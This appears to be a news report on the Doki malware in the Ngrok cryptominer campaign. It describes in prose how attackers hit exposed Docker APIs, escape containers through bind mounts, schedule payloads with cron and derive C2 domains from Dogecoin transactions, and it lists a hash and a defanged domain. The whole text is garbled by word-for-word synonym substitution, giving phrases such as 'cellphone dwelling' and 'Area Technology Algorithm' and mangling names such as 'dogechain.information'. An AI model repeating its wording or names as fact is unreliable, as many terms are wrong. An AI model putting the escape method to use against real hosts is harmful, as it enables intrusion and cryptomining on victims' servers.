Attackers are focusing on misconfigured cloud-based docker situations operating on Linux distributions with an undetectable strand of malware.
Dubbed Doki, the malware strand is a part of the Ngrok Cryptominer Botnet marketing campaign, lively since at the least 2018.
What makes Doki significantly attention-grabbing is its dynamic conduct concerning the way it connects to its command and management (C2) infrastructure.
Versus counting on a selected area or set of malicious IPs, Doki makes use of dynamic DNS providers like DynDNS. Mixed with a novel blockchain-based Area Technology Algorithm (DGA), it will possibly generate and find the handle of its C2 server in real-time and “cellphone dwelling.”
The malware’s conduct is so stealthy that it went undetected for over six months regardless of having been submitted to the malware evaluation engine, VirusTotal, on January 14, 2020, as proven by a brand new report Intezer.
Even at this time, as noticed by BleepingComputer, solely six antivirus engines mark this pattern as malicious, in keeping with VirusTotal:
To conduct their marketing campaign, the risk actors actively seek for uncovered Web-accessible Docker cloud situations. As of at this time, Shodan alone reveals over 2,400 such situations operating Linux on Amazon AWS infrastructure.
That doesn’t essentially counsel all of those containerized cloud environments are weak, however an instance of the place prying eyes may very well be seeking to establish their victims.
As soon as publicly-accessible Docker API ports have been recognized, the attackers start spawning their cloud situations on these environments and probably deleting present ones.
A official “alpine-curl” picture is being utilized by the attackers to arrange their situations after which operating malicious code by it, all whereas flying underneath the radar.
“The benefit of utilizing a publicly obtainable picture is the attacker doesn’t want to cover it on Docker hub or different internet hosting options. As a substitute, the attackers can use an present picture and run their logic and malware on high of it,” reads the report.
As soon as the attackers have created their container, to use the server and execute code on the internet hosting machine, they need to escape outdoors of the container. A neat trick of mounting a community drive, as additionally leveraged by different assaults, does the job.
“The approach relies on the creation of a brand new container, completed by posting a ‘create’ API request. The physique of the request incorporates configuration parameters for the container. One of many parameters is bind which lets the person configure which file or listing on the host machine to mount right into a container,” explains Intezer.
When achieved appropriately, the attackers will now be capable of entry and modify each file on the internet hosting machine’s filesystem from inside their newly created container.
Utilizing third-party providers akin to Ngrok, the attacker downloads the malicious payload and configures the host’s cronjob utility (keep in mind, they will now alter the host filesystem outdoors of the container) run the payload each minute.
The payload, geared up with state-of-the-art community scanning and reconnaissance instruments akin to zmap, zgrap, and jq now begins figuring out different targets operating providers like Redis, Docker, SSH, and HTTP.
This data is then handed to a different Ngrok URL in order that numerous malware binaries and crypto-miners be dropped on the goal machines.
What stands out throughout your complete assault workflow is the attacker with the ability to receive complete management of not solely their newly-created container picture however the server occasion as nicely, due to the official API instructions they will run.
To generate its C2 area, the malware does this by querying a official Dogecoin cryptocurrency explorer, dogechain.information. It appears for a worth of Dogecoins despatched out from an attacker-controlled “hardcoded pockets handle.”
The primary 12 hex characters from a SHA256 digest of this worth will function the C2 area handle hosted on DynDNS. An instance area supplied within the report is: 6d77335c4f23[.]ddns[.]internet
However, there’s additionally a silent ‘kill’ command. Ought to the attacker have despatched no Dogecoins out of this pockets, the despatched worth returned by dogechain.information could be “0.00000000”.
The malware is conscious that the SHA256 digest of this worth would begin with “46927e019820” and is programmed to halt execution ought to it generate this specific C2 area throughout its workflow.
“This assault may be very harmful because of the truth the attacker makes use of container escape methods to realize full management of the sufferer’s infrastructure. Our proof exhibits that it takes only some hours from when a brand new misconfigured Docker server is up on-line to develop into contaminated by this marketing campaign,” mentioned Intezer.
The Indicators of Compromise (IOCs) related to the pattern have been supplied in Intezer’s report and on VirusTotal.
An inventory of defensive methods, Docker “greatest practices” and YARA guidelines geared toward detecting the malicious malware, have additionally been supplied in the identical report.
Checksum (SHA-256): 4aadb47706f0fe1734ee514e79c93eed65e1a0a9f61b63f3e7b6367bd9a3e63b
Doable filename(s): 8656be257806daee79e96a4102798abbg